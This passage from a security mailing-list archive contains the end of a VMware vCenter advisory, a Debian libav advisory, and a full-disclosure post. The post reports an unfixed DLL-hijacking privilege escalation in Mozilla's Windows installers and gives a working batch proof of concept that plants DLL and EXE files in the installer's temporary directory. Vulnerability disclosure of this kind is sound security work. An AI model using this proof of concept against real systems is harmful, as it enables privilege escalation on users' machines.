   vCenter Server
   --
   Downloads and Documentation:
   https://www.vmware.com/go/download-vsphere


5. References

   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6931

- ------------------------------------------------------------------------

6. Change log

   2016-06-14 VMSA-2016-0009
   Initial security advisory in conjunction with the release of VMware
   vCenter Server 5.0 U3g on 2016-06-14.

- ------------------------------------------------------------------------

7. Contact

   E-mail list for product security notifications and announcements:
   http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

   This Security Advisory is posted to the following lists:

   security-announce at lists.vmware.com
   bugtraq at securityfocus.com
   fulldisclosure at seclists.org

   E-mail: security at vmware.com
   PGP key at: https://kb.vmware.com/kb/1055

   VMware Security Advisories
   http://www.vmware.com/security/advisories

   Consolidated list of VMware Security Advisories
   http://kb.vmware.com/kb/2078735

   VMware Security Response Policy
   https://www.vmware.com/support/policies/security_response.html

   VMware Lifecycle Support Phases
   https://www.vmware.com/support/policies/lifecycle.html

   Twitter
   https://twitter.com/VMwareSRC

   Copyright 2016 VMware Inc.  All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.8.3 (Build 4028)
Charset: utf-8

wj8DBQFXYOczDEcm8Vbi9kMRApfPAJ0Urm1NrLwTbkY0vsGeXQtS0kWDZQCgmYPj
dGcJx5HCyLJCiIz/FCMpGIU=
=FYiK
-----END PGP SIGNATURE-----


[CVE-2014-1520] NOT FIXED: privilege escalation via Mozilla's executable installers

2016-06-15 Thread Stefan Kanthak
Hi @ll,

 should
have fixed CVE-2014-1520 in Mozilla's executable installers for
Windows ... but does NOT!

JFTR: this type of vulnerability (really: a bloody stupid trivial
  beginner's error!) is well-known and well-documented as
  .


Proof of concept/demonstration:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

0. download "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe",
   "Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe"
   and save them in an arbitrary directory;

1. download 
   plus  and
   save them in an(other) arbitrary directory;

2. start your editor, copy and paste the following 10 lines and
   save them as "POC.CMD" in the same directory as "SHFOLDER.DLL"
   and "SENTINEL.EXE" downloaded in step 1:

:WAIT1
@If Not Exist "%TEMP%\7z*.tmp" Goto :WAIT1
For /D %%! In ("%TEMP%\7z*.tmp") Do Set foobar=%%!
Copy "%~dp0shfolder.dll" "%foobar%\shfolder.dll"
:WAIT2
@If Not Exist "%foobar%\core\maintenanceservice.exe" Goto :WAIT2
Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice.exe"
:WAIT3
@If Not Exist "%foobar%\core\maintenanceservice_installer.exe" Goto :WAIT3
Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice_installer.exe"

3. execute the batch script "POC.CMD" created in step 2;

4. execute "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe",
   "Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe"
   downloaded in step 0. and proceed as directed: notice the message
   boxes displayed from the copies of "SHFOLDER.DLL" and "SENTINEL.EXE"
   placed by the batch script started in step 3 in the unsafe TEMP
   subdirectory created by Mozilla's vulnerable executable installers!

PWNED!


Mitigation(s):
~~~~~~~~~~~~~~

0. don't use executable installers. DUMP THEM, NOW!

1. see  as well as
   .

2. stay away from Mozilla's vulnerable installers for their Windows
   software (at least until Mozilla starts to develop a sense for
   the safety and security of their users).


stay tuned
Stefan Kanthak


Timeline:
~~~~~~~~~

2015-10-25

  not even an attempt to fix this vulnerability (check but
  
)

2016-04-30
  
  
  
  
  

  not even an attempt to fix this vulnerability (check but
  
)

2016-06-15    deadline expired after 45 days, report published


[SECURITY] [DSA 3603-1] libav security update

2016-06-15 Thread Moritz Muehlenhoff
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-3603-1   secur...@debian.org
https://www.debian.org/security/   Moritz Muehlenhoff
June 14, 2016 https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package: libav
CVE ID : CVE-2016-3062

Several security issues have been corrected in multiple demuxers and
decoders of the libav multimedia library. A full list of the changes is
available at
https://git.libav.org/?p=libav.git;a=blob;f=Changelog;hb=refs/tags/v11.7

For the stable distribution (jessie), this problem has been fixed in
version 6:11.7-1~deb8u1.

We recommend that you upgrade your libav packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

-----END PGP SIGNATURE-----